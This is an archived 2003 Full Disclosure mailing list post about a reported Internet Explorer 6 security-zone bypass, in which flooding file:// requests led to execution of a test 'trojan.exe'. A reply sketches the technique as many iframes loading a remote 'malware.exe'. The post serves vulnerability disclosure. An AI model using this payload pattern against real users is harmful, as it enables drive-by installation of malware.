Full Disclosure mailing list archives
Fwd: Re: Flooding Internet Explorer 6.0.2800 (6.x?) security zones ! [CRITICAL]
From: "http-equiv () excite com" <1 () malware com>
Date: Wed, 14 May 2003 20:37:52 -0000
I had sent this to bugtraq when you initially posted it, confirming having seen it in the past as well. Will try your html file and see if can get it up and running again. Forwarded From: "http-equiv () excite com"
<!-- I've noticed that on my test environment it is possible to bypass InternetExplorer Zones protection by flooding it with large number
of
file://requests in example to infected fileserver. The result of
this
bypass isEXECUTION OF ANY REQUESTED FILE. My requested file was 'trojan.exe' placedon neighbour WIN2K Professional workstation. To see code used during the test check files in attached archive. On IE 6.0 the result was always the same, after more than 200
dialog
boxes with 'trojan.exe' request, suddenly requested file got
executed
--> Excellent. Can confirm seeing this happen twice in the past two years. Both in Internet Explorer and Outlook Express, using an
iframe
and a remote executable on the server e.g. <iframe src="http://...../malware.exe"> multiple instances on one page. One slipped through and the file was executed automatically. Not been able to replicate since though. May be a combo machine power and 'confusing' IE [easier]. -- http://www.malware.com
-- http://www.malware.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Fwd: Re: Flooding Internet Explorer 6.0.2800 (6.x?) security zones ! [CRITICAL] http-equiv () excite com (May 14)
- <Possible follow-ups>
- Fwd: Re: Flooding Internet Explorer 6.0.2800 (6.x?) security zones ! [CRITICAL] http-equiv () excite com (May 14)